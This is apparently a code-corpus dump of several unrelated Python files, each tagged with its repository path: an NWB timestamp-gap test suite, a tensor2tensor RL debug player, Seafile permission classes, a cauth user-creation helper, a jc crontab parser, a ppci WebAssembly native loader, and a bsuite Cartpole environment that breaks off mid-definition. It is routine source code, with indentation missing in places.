array = [1, 2, 3, 4, 5, 7, 9, 10, 11, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 2)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 4.9999)
self.assertEqual(round(fl_mda_valid_times[1].start_time, 4), 9.0001)
self.assertEqual(round(fl_mda_valid_times[1].stop_time, 4), 11.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_without_gap(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 9.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_at_start(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
array = [1, 3, 5, 6, 7, 8, 9, 10, 11, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 5.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 11.9999)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_at_end(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10, ])
array = [1, 2, 3, 4, 5, 6, 7, 8, 10, 12]
for i, number in enumerate(array):
mock_array[i] = number
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = mock_array
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_times = fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
self.assertEqual(len(fl_mda_valid_times), 1)
self.assertEqual(round(fl_mda_valid_times[0].start_time, 4), 1.0001)
self.assertEqual(round(fl_mda_valid_times[0].stop_time, 4), 7.9999)
@should_raise(TypeError)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_failed_due_to_None_param(self):
gaps_margin = 0.0001
sampling_rate = 1.0
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=None,
gaps_margin=gaps_margin
)
@should_raise(MissingDataException)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_failed_due_to_lack_of_timestamps(self):
gaps_margin = 0.0001
sampling_rate = 1.0
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = None
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
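# The manager implementation is not shown here, but the assertions above imply
# a simple rule: split the timestamp array wherever consecutive samples are more
# than the (multiplier-scaled) sampling period apart, shrink each segment by
# gaps_margin, and drop one-sample segments. The function below is an inferred
# sketch written only from these tests; names and defaults are assumptions.
import numpy as np
def sketch_valid_times(timestamps, sampling_rate=1.0, period_multiplier=1.5, gaps_margin=0.0001):
    """Illustrative gap detection inferred from the test expectations."""
    max_step = period_multiplier / sampling_rate   # larger steps count as gaps
    times = np.asarray(timestamps, dtype=float)
    segments = []
    start = times[0]
    for prev, curr in zip(times[:-1], times[1:]):
        if curr - prev > max_step:
            if prev - start > 2 * gaps_margin:     # skip degenerate single-sample runs
                segments.append((start + gaps_margin, prev - gaps_margin))
            start = curr
    if times[-1] - start > 2 * gaps_margin:
        segments.append((start + gaps_margin, times[-1] - gaps_margin))
    return segments
# sketch_valid_times([1, 2, 3, 4, 5, 7, 9, 10, 11, 12])
# -> [(1.0001, 4.9999), (9.0001, 11.9999)]  (matches the first test above)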
|
rec_to_nwb/test/processing/mda/time/valid/test_flMdaValidTimeManager.py
| 0.7237 | 0.496704 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
from gym.core import Env
from gym.spaces import Box
from gym.spaces import Discrete
from gym.utils import play
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from tensor2tensor.data_generators import gym_env
from tensor2tensor.models.research.rl import get_policy
from tensor2tensor.rl.envs.simulated_batch_env import SimulatedBatchEnv
from tensor2tensor.rl.trainer_model_based import FLAGS
from tensor2tensor.rl.trainer_model_based import setup_directories
from tensor2tensor.rl.trainer_model_based import temporary_flags
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
_font = None
FONT_SIZE = 20
def _get_font():
global _font
if _font is None:
font_paths = []
for path in font_paths:
try:
_font = ImageFont.truetype(path, FONT_SIZE)
return _font
except: # pylint: disable=bare-except
pass
def _assert_image(img):
if isinstance(img, np.ndarray):
img = Image.fromarray(np.ndarray.astype(img, np.uint8))
return img
def write_on_image(img, text="", position=(0, 0), color=(255, 255, 255)):
img = _assert_image(img)
if not text:
return img
draw = ImageDraw.Draw(img)
font = _get_font()
draw.text(position, text, color, font=font)
return img
def concatenate_images(imgs, axis=1):
imgs = [_assert_image(img) for img in imgs]
imgs_np = [np.array(img) for img in imgs]
concatenated_im_np = np.concatenate(imgs_np, axis=axis)
return _assert_image(concatenated_im_np)
class DebugBatchEnv(Env):
"""Debugging Environment."""
INFO_PANE_WIDTH = 250
def __init__(self, hparams, sess=None):
self.action_space = Discrete(6)
self.observation_space = Box(
low=0, high=255, shape=(210, 160+DebugBatchEnv.INFO_PANE_WIDTH, 3),
dtype=np.uint8)
self._tmp = 1
self.res = None
self.sess = sess if sess is not None else tf.Session()
self._prepare_networks(hparams, self.sess)
def _prepare_networks(self, hparams, sess):
self.action = tf.placeholder(shape=(1,), dtype=tf.int32)
batch_env = SimulatedBatchEnv(hparams.environment_spec, hparams.num_agents)
self.reward, self.done = batch_env.simulate(self.action)
self.observation = batch_env.observ
self.reset_op = batch_env.reset(tf.constant([0], dtype=tf.int32))
environment_wrappers = hparams.environment_spec.wrappers
wrappers = copy.copy(environment_wrappers) if environment_wrappers else []
to_initialize = [batch_env]
for w in wrappers:
batch_env = w[0](batch_env, **w[1])
to_initialize.append(batch_env)
def initialization_lambda():
for batch_env in to_initialize:
batch_env.initialize(sess)
self.initialize = initialization_lambda
obs_copy = batch_env.observ + 0
actor_critic = get_policy(tf.expand_dims(obs_copy, 0), hparams)
self.policy_probs = actor_critic.policy.probs[0, 0, :]
self.value = actor_critic.value[0, :]
def render(self, mode="human"):
raise NotImplementedError()
def _fake_reset(self):
self._tmp = 0
observ = np.ones(shape=(210, 160, 3), dtype=np.uint8) * 10 * self._tmp
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
self.res = (observ, 0, False, [0.1, 0.5, 0.5], 1.1)
def _reset_env(self):
observ = self.sess.run(self.reset_op)[0, ...]
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
# TODO(pmilos): put correct numbers
self.res = (observ, 0, False, [0.1, 0.5, 0.5], 1.1)
def reset(self):
self._reset_env()
observ = self._augment_observation()
return observ
def _step_fake(self, action):
observ = np.ones(shape=(210, 160, 3), dtype=np.uint8)*10*self._tmp
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
self._tmp += 1
if self._tmp > 20:
self._tmp = 0
rew = 1
done = False
probs = np.ones(shape=(6,), dtype=np.float32)/6
vf = 0.0
return observ, rew, done, probs, vf
def _step_env(self, action):
observ, rew, done, probs, vf = self.sess.\
run([self.observation, self.reward, self.done, self.policy_probs,
self.value],
feed_dict={self.action: [action]})
return observ[0, ...], rew[0, ...], done[0, ...], probs, vf
def _augment_observation(self):
observ, rew, _, probs, vf = self.res
info_pane = np.zeros(shape=(210, DebugBatchEnv.INFO_PANE_WIDTH, 3),
dtype=np.uint8)
probs_str = ""
for p in probs:
probs_str += "%.2f" % p + ", "
probs_str = probs_str[:-2]
action = np.argmax(probs)
info_str = " Policy:{}\n Action:{}\n Value function:{}\n Reward:{}".format(
probs_str, action, vf, rew)
print("Info str:{}".format(info_str))
# info_pane = write_on_image(info_pane, info_str)
augmented_observ = concatenate_images([observ, info_pane])
augmented_observ = np.array(augmented_observ)
return augmented_observ
def step(self, action):
# Special codes
if action == 100:
# skip action
_, rew, done, _, _ = self.res
observ = self._augment_observation()
return observ, rew, done, {}
if action == 101:
# reset
self.reset()
_, rew, done, _, _ = self.res
observ = self._augment_observation()
return observ, rew, done, {}
if action == 102:
# play
raise NotImplementedError()
# standard codes
observ, rew, done, probs, vf = self._step_env(action)
self.res = (observ, rew, done, probs, vf)
observ = self._augment_observation()
return observ, rew, done, {"probs": probs, "vf": vf}
def main(_):
hparams = registry.hparams(FLAGS.loop_hparams_set)
hparams.parse(FLAGS.loop_hparams)
output_dir = FLAGS.output_dir
subdirectories = ["data", "tmp", "world_model", "ppo"]
using_autoencoder = hparams.autoencoder_train_steps > 0
if using_autoencoder:
subdirectories.append("autoencoder")
directories = setup_directories(output_dir, subdirectories)
if hparams.game in gym_env.ATARI_GAMES:
game_with_mode = hparams.game + "_deterministic-v4"
else:
game_with_mode = hparams.game
if using_autoencoder:
simulated_problem_name = (
"gym_simulated_discrete_problem_with_agent_on_%s_autoencoded"
% game_with_mode)
else:
simulated_problem_name = ("gym_simulated_discrete_problem_with_agent_on_%s"
% game_with_mode)
if simulated_problem_name not in registry.list_problems():
tf.logging.info("Game Problem %s not found; dynamically registering",
simulated_problem_name)
gym_env.register_game(hparams.game, game_mode="Deterministic-v4")
epoch = hparams.epochs-1
epoch_data_dir = os.path.join(directories["data"], str(epoch))
ppo_model_dir = directories["ppo"]
world_model_dir = directories["world_model"]
gym_problem = registry.problem(simulated_problem_name)
model_hparams = trainer_lib.create_hparams(hparams.generative_model_params)
environment_spec = copy.copy(gym_problem.environment_spec)
environment_spec.simulation_random_starts = hparams.simulation_random_starts
batch_env_hparams = trainer_lib.create_hparams(hparams.ppo_params)
batch_env_hparams.add_hparam("model_hparams", model_hparams)
batch_env_hparams.add_hparam("environment_spec", environment_spec)
batch_env_hparams.num_agents = 1
with temporary_flags({
"problem": simulated_problem_name,
"model": hparams.generative_model,
"hparams_set": hparams.generative_model_params,
"output_dir": world_model_dir,
"data_dir": epoch_data_dir,
}):
sess = tf.Session()
env = DebugBatchEnv(batch_env_hparams, sess)
sess.run(tf.global_variables_initializer())
env.initialize()
env_model_loader = tf.train.Saver(
tf.global_variables("next_frame*"))
trainer_lib.restore_checkpoint(world_model_dir, env_model_loader, sess,
must_restore=True)
model_saver = tf.train.Saver(
tf.global_variables(".*network_parameters.*"))
trainer_lib.restore_checkpoint(ppo_model_dir, model_saver, sess)
key_mapping = gym_problem.env.env.get_keys_to_action()
# map special codes
key_mapping[()] = 100
key_mapping[(ord("r"),)] = 101
key_mapping[(ord("p"),)] = 102
play.play(env, zoom=2, fps=10, keys_to_action=key_mapping)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
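# A standalone sketch of how the image helpers above compose the debug view,
# mirroring _augment_observation without a TF session. Sizes come from the
# original constants; the text content is a placeholder.
def sketch_augmented_frame():
    observ = np.zeros(shape=(210, 160, 3), dtype=np.uint8)                        # fake game frame
    info_pane = np.zeros(shape=(210, DebugBatchEnv.INFO_PANE_WIDTH, 3), dtype=np.uint8)
    info_pane = write_on_image(info_pane, " Policy: 0.17, 0.17, ...")              # PIL falls back to its default font
    frame = concatenate_images([observ, info_pane])                                # 210 x 410 RGB image
    return np.array(frame)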
|
v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/t2t/tensor2tensor/rl/model_rl_experiment_player.py
| 0.617513 | 0.248386 |
from rest_framework.permissions import BasePermission
from django.conf import settings
from seaserv import check_permission, is_repo_owner, ccnet_api
from seahub.utils import is_pro_version
SAFE_METHODS = ['GET', 'HEAD', 'OPTIONS']
class IsRepoWritable(BasePermission):
"""
    Allows access only to users who have write permission to the repo.
"""
def has_permission(self, request, view, obj=None):
if request.method in SAFE_METHODS:
return True
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
if user and check_permission(repo_id, user) == 'rw':
return True
return False
class IsRepoAccessible(BasePermission):
"""
Check whether user has Read or Write permission to a repo.
"""
def has_permission(self, request, view, obj=None):
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
return True if check_permission(repo_id, user) else False
class IsRepoOwner(BasePermission):
"""
Check whether user is the owner of a repo.
"""
def has_permission(self, request, view, obj=None):
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
return True if is_repo_owner(user, repo_id) else False
class IsGroupMember(BasePermission):
"""
Check whether user is in a group.
"""
def has_permission(self, request, view, obj=None):
group_id = int(view.kwargs.get('group_id', ''))
username = request.user.username if request.user else ''
return True if ccnet_api.is_group_user(group_id, username) else False
class CanInviteGuest(BasePermission):
"""Check user has permission to invite a guest.
"""
def has_permission(self, request, *args, **kwargs):
return settings.ENABLE_GUEST_INVITATION and \
request.user.permissions.can_invite_guest()
class CanGenerateShareLink(BasePermission):
"""Check user has permission to generate share link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_generate_share_link()
class CanGenerateUploadLink(BasePermission):
"""Check user has permission to generate upload link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_generate_upload_link()
class CanSendShareLinkMail(BasePermission):
"""Check user has permission to generate upload link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_send_share_link_mail()
class IsProVersion(BasePermission):
"""
Check whether Seafile is pro version
"""
def has_permission(self, request, *args, **kwargs):
return is_pro_version()
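# Hypothetical sketch of attaching these permission classes to a DRF view; the
# view name and response body are illustrative and not part of this module.
from rest_framework.views import APIView
from rest_framework.response import Response
class RepoExampleView(APIView):
    """Example endpoint guarded by the repo permission classes above."""
    permission_classes = (IsRepoAccessible, CanGenerateShareLink)
    def get(self, request, repo_id, format=None):
        # DRF evaluates has_permission() on each class before get() runs;
        # IsRepoAccessible reads repo_id from view.kwargs, so the URL pattern
        # must capture it under that name.
        return Response({'repo_id': repo_id})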
|
seahub/api2/permissions.py
| 0.462959 | 0.072308 |
import hashlib
import logging
from stevedore import driver
from pecan import conf
from cauth.service import base
from cauth.model import db as auth_map
from cauth.utils import transaction
from cauth.utils import exceptions
def differentiate(login, domain, uid):
suffix = hashlib.sha1((domain + '/' + str(uid)).encode()).hexdigest()
return login + '_' + suffix[:6]
class UserDetailsCreator(transaction.TransactionLogger):
log = logging.getLogger("cauth.UserDetailsCreator")
def __init__(self, conf):
self.services = []
for service in conf.services:
try:
plugin = driver.DriverManager(
namespace='cauth.service',
name=service,
invoke_on_load=True,
invoke_args=(conf,)).driver
self.services.append(plugin)
except base.ServiceConfigurationError as e:
self.logger.error(str(e))
def create_user(self, user):
external_info = user.get('external_auth', {})
transactionID = user.get('transactionID', '')
c_id = -1
# skip if authenticating with an API key
if external_info:
if external_info.get('domain') == 'CAUTH_API_KEY':
c_id = external_info['external_id']
else:
external_info['username'] = user['login']
try:
c_id = auth_map.get_or_create_authenticated_user(
**external_info)
except exceptions.UsernameConflictException as e:
strategy = conf.auth.get('login_collision_strategy')
if strategy == 'DIFFERENTIATE':
old_login = user['login']
user['login'] = differentiate(
user['login'],
external_info.get('domain', ''),
external_info['external_id'])
external_info['username'] = user['login']
self.tinfo(
"Login \"%s\" already registered for domain "
"%s, uid %s, differentiating login as %s",
transactionID, old_login,
e.external_auth_details['domain'],
e.external_auth_details['external_id'],
user['login'])
c_id = auth_map.get_or_create_authenticated_user(
**external_info)
elif strategy == 'FORBID':
raise
else:
self.terror("Incorrect login collision strategy "
"\"%s\", defaulting to \"FORBID\"",
transactionID, strategy)
raise
del user['external_auth']
user['external_id'] = c_id
for service in self.services:
try:
service.register_new_user(user)
except base.UserRegistrationError:
self.texception('Error when adding user %s (ID %s)',
transactionID, user['login'], c_id)
return c_id
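# For reference, a tiny hypothetical demonstration of differentiate(): the
# suffix is the first six hex characters of sha1("<domain>/<uid>"), so the same
# login arriving from different identity providers maps to distinct usernames.
# The domain and uid below are made-up values.
def _demo_differentiate():
    renamed = differentiate('jdoe', 'https://idp.example.com', 42)
    # 'jdoe_' followed by six hex characters derived from the domain/uid pair
    return renamed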
|
cauth/utils/userdetails.py
| 0.298798 | 0.049451 |
import jc.utils
import jc.parsers.universal
class info():
version = '1.0'
description = 'crontab file parser with user support'
author = '<NAME>'
author_email = '<EMAIL>'
# details = 'enter any other details here'
# compatible options: linux, darwin, cygwin, win32, aix, freebsd
compatible = ['linux', 'darwin', 'aix', 'freebsd']
__version__ = info.version
def process(proc_data):
"""
Final processing to conform to the schema.
Parameters:
proc_data: (dictionary) raw structured data to process
Returns:
Dictionary. Structured data with the following schema:
{
"variables": [
"name": string,
"value": string
],
"schedule": [
{
"occurrence" string,
"minute": [
string
],
"hour": [
string
],
"day_of_month": [
string
],
"month": [
string
],
"day_of_week": [
string
],
"occurrence": string,
"user": string,
"command": string
}
]
}
"""
    # put items in lists
try:
for entry in proc_data['schedule']:
entry['minute'] = entry['minute'].split(',')
entry['hour'] = entry['hour'].split(',')
entry['day_of_month'] = entry['day_of_month'].split(',')
entry['month'] = entry['month'].split(',')
entry['day_of_week'] = entry['day_of_week'].split(',')
except (KeyError):
pass
return proc_data
def parse(data, raw=False, quiet=False):
"""
Main text parsing function
Parameters:
data: (string) text data to parse
raw: (boolean) output preprocessed JSON if True
quiet: (boolean) suppress warning messages if True
Returns:
Dictionary. Raw or processed structured data.
"""
if not quiet:
jc.utils.compatibility(__name__, info.compatible)
raw_output = {}
cleandata = data.splitlines()
# Clear any blank lines
cleandata = list(filter(None, cleandata))
# Clear any commented lines
for i, line in reversed(list(enumerate(cleandata))):
if line.strip().find('#') == 0:
cleandata.pop(i)
# Pop any variable assignment lines
cron_var = []
for i, line in reversed(list(enumerate(cleandata))):
if line.find('=') != -1:
var_line = cleandata.pop(i)
var_name = var_line.split('=', maxsplit=1)[0].strip()
var_value = var_line.split('=', maxsplit=1)[1].strip()
cron_var.append({'name': var_name,
'value': var_value})
raw_output['variables'] = cron_var
# Pop any shortcut lines
shortcut_list = []
for i, line in reversed(list(enumerate(cleandata))):
if line.strip().startswith('@'):
shortcut_line = cleandata.pop(i)
occurrence = shortcut_line.split(maxsplit=1)[0].strip().lstrip('@')
usr = shortcut_line.split(maxsplit=2)[1].strip()
cmd = shortcut_line.split(maxsplit=2)[2].strip()
shortcut_list.append({'occurrence': occurrence,
'user': usr,
'command': cmd})
# Add header row for parsing
cleandata[:0] = ['minute hour day_of_month month day_of_week user command']
if len(cleandata) > 1:
cron_list = jc.parsers.universal.simple_table_parse(cleandata)
raw_output['schedule'] = cron_list
# Add shortcut entries back in
for item in shortcut_list:
raw_output['schedule'].append(item)
if raw:
return raw_output
else:
return process(raw_output)
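# Brief usage sketch of the parser above; the crontab text is a made-up sample
# and the resulting structure follows the schema documented in process().
if __name__ == '__main__':
    SAMPLE = '\n'.join([
        'SHELL=/bin/bash',
        '# rotate logs nightly',
        '5 0 * * * root /usr/sbin/logrotate /etc/logrotate.conf',
        '@reboot backup /usr/local/bin/warm-cache.sh',
    ])
    result = parse(SAMPLE, quiet=True)
    # result['variables'] -> [{'name': 'SHELL', 'value': '/bin/bash'}]
    # result['schedule'] -> the regular entry with minute/hour/... split into
    #                       lists, plus the '@reboot' shortcut entry
    print(result)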
|
jc/parsers/crontab_u.py
| 0.49585 | 0.304145 |
import logging
import os
import shelve
import struct
from ...utils.codepage import load_obj, MemoryPage
from ...irutils import verify_module
from .. import wasm_to_ir
from ..components import Table
from ..util import PAGE_SIZE
from ._base_instance import ModuleInstance, WasmMemory, WasmGlobal
logger = logging.getLogger("instantiate")
def native_instantiate(module, imports, reporter, cache_file):
""" Load wasm module native """
from ...api import ir_to_object, get_current_arch
logger.info("Instantiating wasm module as native code")
arch = get_current_arch()
# key = (arch, module)
# TODO: think of clever caching trickery:
cache_file = None
if cache_file and os.path.exists(cache_file):
logger.info("Using cached object from %s", cache_file)
with shelve.open(cache_file) as s:
obj = s["obj"]
ppci_module = s["ppci_module"]
else:
# TODO: use cache here to short circuit re-compilation
# hash(key)
# print(hash(key))
ppci_module = wasm_to_ir(
module, arch.info.get_type_info("ptr"), reporter=reporter
)
verify_module(ppci_module)
obj = ir_to_object([ppci_module], arch, debug=True, reporter=reporter)
if cache_file:
logger.info("Saving object to %s for later use", cache_file)
with shelve.open(cache_file) as s:
s["obj"] = obj
s["ppci_module"] = ppci_module
instance = NativeModuleInstance(obj, imports)
instance._wasm_function_names = ppci_module._wasm_function_names
instance._wasm_global_names = ppci_module._wasm_global_names
return instance
class NativeModuleInstance(ModuleInstance):
""" Wasm module loaded as natively compiled code """
def __init__(self, obj, imports2):
super().__init__()
imports = {}
imports["wasm_rt_memory_grow"] = self.memory_grow
imports["wasm_rt_memory_size"] = self.memory_size
for name, imp_obj in imports2.items():
assert name not in imports
if isinstance(imp_obj, Table):
# print(name, obj)
ptr_size = 8 # TODO: determine this?
table_byte_size = imp_obj.max * ptr_size
# Allocate native memory page for table.
self._table_obj = MemoryPage(table_byte_size)
# Enter table memory page in extra symbols:
magic_key = "func_table"
assert magic_key not in imports
imports[magic_key] = self._table_obj
imports[name] = self._table_obj
else:
imports[name] = imp_obj
self._code_module = load_obj(obj, imports=imports)
def _run_init(self):
self._code_module._run_init()
def memory_size(self) -> int:
""" return memory size in pages """
return self._memory_data_page.size // PAGE_SIZE
def memory_grow(self, amount: int) -> int:
""" Grow memory and return the old size.
Current strategy:
- claim new memory
- copy all data
- free old memory
- update wasm memory base pointer
"""
max_size = self._memories[0].max_size
old_size = self.memory_size()
new_size = old_size + amount
# Keep memory within sensible bounds:
if new_size >= 0x10000:
return -1
if max_size is not None and new_size > max_size:
return -1
# Read old data:
self._memory_data_page.seek(0)
old_data = self._memory_data_page.read()
# Create new page and fill with old data:
self._memory_data_page = MemoryPage(new_size * PAGE_SIZE)
self._memory_data_page.write(old_data)
# Update pointer:
self.set_mem_base_ptr(self._memory_data_page.addr)
return old_size
def memory_create(self, min_size, max_size):
assert len(self._memories) == 0
self._memory_data_page = MemoryPage(min_size * PAGE_SIZE)
mem0 = NativeWasmMemory(self, min_size, max_size)
self._memories.append(mem0)
self.set_mem_base_ptr(self._memory_data_page.addr)
def set_mem_base_ptr(self, base_addr):
""" Set memory base address """
baseptr = self._code_module.get_symbol_offset("wasm_mem0_address")
# print(baseptr)
# TODO: major hack:
# TODO: too many assumptions made here ...
self._code_module._data_page.seek(baseptr)
self._code_module._data_page.write(struct.pack("Q", base_addr))
def get_func_by_index(self, index: int):
exported_name = self._wasm_function_names[index]
return getattr(self._code_module, exported_name)
def get_global_by_index(self, index: int):
global_name = self._wasm_global_names[index]
return NativeWasmGlobal(global_name, self._code_module)
class NativeWasmMemory(WasmMemory):
""" Native wasm memory emulation """
def __init__(self, instance, min_size, max_size):
super().__init__(min_size, max_size)
self._instance = instance
def memory_size(self) -> int:
""" return memory size in pages """
        return self._instance._memory_data_page.size // PAGE_SIZE
def write(self, address: int, data):
""" Write some data to memory """
self._instance._memory_data_page.seek(address)
self._instance._memory_data_page.write(data)
def read(self, address: int, size: int) -> bytes:
self._instance._memory_data_page.seek(address)
data = self._instance._memory_data_page.read(size)
assert len(data) == size
return data
class NativeWasmGlobal(WasmGlobal):
def __init__(self, name, code_obj):
super().__init__(name)
self._code_obj = code_obj
def _get_ptr(self):
# print('Getting address of', self.name)
vpointer = getattr(self._code_obj, self.name[1].name)
return vpointer
def read(self):
addr = self._get_ptr()
# print('Reading', self.name, addr)
value = addr.contents.value
return value
def write(self, value):
addr = self._get_ptr()
# print('Writing', self.name, addr, value)
addr.contents.value = value
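# The memory_grow docstring above describes a claim-copy-free-repoint strategy.
# The sketch below shows the same pattern in isolation with a plain bytearray,
# independent of the MemoryPage/codepage machinery (purely illustrative).
def grow_by_copy(memory: bytearray, amount: int, max_pages=None):
    """Return (new_memory, old_size_in_pages), or (memory, -1) on failure."""
    old_pages = len(memory) // PAGE_SIZE
    new_pages = old_pages + amount
    if new_pages >= 0x10000 or (max_pages is not None and new_pages > max_pages):
        return memory, -1
    new_memory = bytearray(new_pages * PAGE_SIZE)
    new_memory[:len(memory)] = memory   # copy all existing data
    # The caller must now repoint its base pointer at new_memory, as
    # NativeModuleInstance.set_mem_base_ptr() does for native code.
    return new_memory, old_pages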
|
ppci/wasm/execution/_native_instance.py
| 0.2414 | 0.160102 |
"""The Cartpole reinforcement learning environment."""
# Import all packages
import collections
from bsuite.experiments.cartpole import sweep
import dm_env
from dm_env import specs
import numpy as np
CartpoleState = collections.namedtuple(
'CartpoleState', ['x', 'x_dot', 'theta', 'theta_dot', 'time_elapsed'])
CartpoleConfig = collections.namedtuple(
'CartpoleConfig',
['mass_cart', 'mass_pole', 'length', 'force_mag', 'gravity']
)
def step_cartpole(action: int,
timescale: float,
state: CartpoleState,
config: CartpoleConfig) -> CartpoleState:
"""Helper function to step cartpole state under given config."""
# Unpack variables into "short" names for mathematical equation
force = (action - 1) * config.force_mag
cos = np.cos(state.theta)
sin = np.sin(state.theta)
pl = config.mass_pole * config.length
l = config.length
m_pole = config.mass_pole
m_total = config.mass_cart + config.mass_pole
g = config.gravity
# Compute the physical evolution
temp = (force + pl * state.theta_dot**2 * sin) / m_total
theta_acc = (g * sin - cos * temp) / (l * (4/3 - m_pole * cos**2 / m_total))
x_acc = temp - pl * theta_acc * cos / m_total
# Update states according to discrete dynamics
x = state.x + timescale * state.x_dot
x_dot = state.x_dot + timescale * x_acc
theta = np.remainder(
state.theta + timescale * state.theta_dot, 2 * np.pi)
theta_dot = state.theta_dot + timescale * theta_acc
time_elapsed = state.time_elapsed + timescale
return CartpoleState(x, x_dot, theta, theta_dot, time_elapsed)
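# Illustrative note (not part of the original file): the update above encodes
# the standard cart-pole dynamics of Barto, Sutton & Anderson (1983),
#   temp      = (force + pl * theta_dot**2 * sin(theta)) / m_total
#   theta_acc = (g * sin(theta) - cos(theta) * temp)
#               / (l * (4/3 - m_pole * cos(theta)**2 / m_total))
#   x_acc     = temp - pl * theta_acc * cos(theta) / m_total
# integrated with explicit Euler steps of size `timescale`.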
class Cartpole(dm_env.Environment):
"""This implements a version of the classic Cart Pole task.
For more information see:
https://webdocs.cs.ualberta.ca/~sutton/papers/barto-sutton-anderson-83.pdf
The observation is a vector representing:
`(x, x_dot, sin(theta), cos(theta), theta_dot, time_elapsed)`
The actions are discrete ['left', 'stay', 'right']. Episodes start with the
pole close to upright. Episodes end when the pole falls, the cart falls off
the table, or the max_time is reached.
"""
def __init__(self,
height_threshold: float = 0.8,
x_threshold: float = 3.,
timescale: float = 0.01,
max_time: float = 10.,
init_range: float = 0.05,
seed: int = None):
# Setup.
self._state = CartpoleState(0, 0, 0, 0, 0)
self._reset_next_step = True
self._rng = np.random.RandomState(seed)
self._init_fn = lambda: self._rng.uniform(low=-init_range, high=init_range)
# Logging info
self._raw_return = 0.
self._best_episode = 0.
self._episode_return = 0.
# Reward/episode logic
self._height_threshold = height_threshold
self._x_threshold = x_threshold
self._timescale = timescale
self._max_time = max_time
# Problem config
self._cartpole_config = CartpoleConfig(
mass_cart=1.,
mass_pole=0.1,
length=0.5,
force_mag=10.,
gravity=9.8,
)
# Public attributes.
self.bsuite_num_episodes = sweep.NUM_EPISODES
def reset(self):
self._reset_next_step = False
self._state = CartpoleState(
x=self._init_fn(),
x_dot=self._init_fn(),
theta=self._init_fn(),
theta_dot=self._init_fn(),
time_elapsed=0.,
)
self._episode_return = 0
return dm_env.restart(self.observation)
def step(self, action):
if self._reset_next_step:
return self.reset()
self._state = step_cartpole(
action=action,
timescale=self._timescale,
state=self._state,
config=self._cartpole_config,
)
# Rewards only when the pole is central and balanced
is_reward = (np.cos(self._state.theta) > self._height_threshold
and np.abs(self._state.x) < self._x_threshold)
reward = 1. if is_reward else 0.
self._raw_return += reward
self._episode_return += reward
self._best_episode = max(self._episode_return, self._best_episode)
if self._state.time_elapsed > self._max_time or not is_reward:
self._reset_next_step = True
return dm_env.termination(reward=reward, observation=self.observation)
else: # continuing transition.
return dm_env.transition(reward=reward, observation=self.observation)
def action_spec(self):
    return specs.DiscreteArray(dtype=int, num_values=3, name='action')
def observation_spec(self):
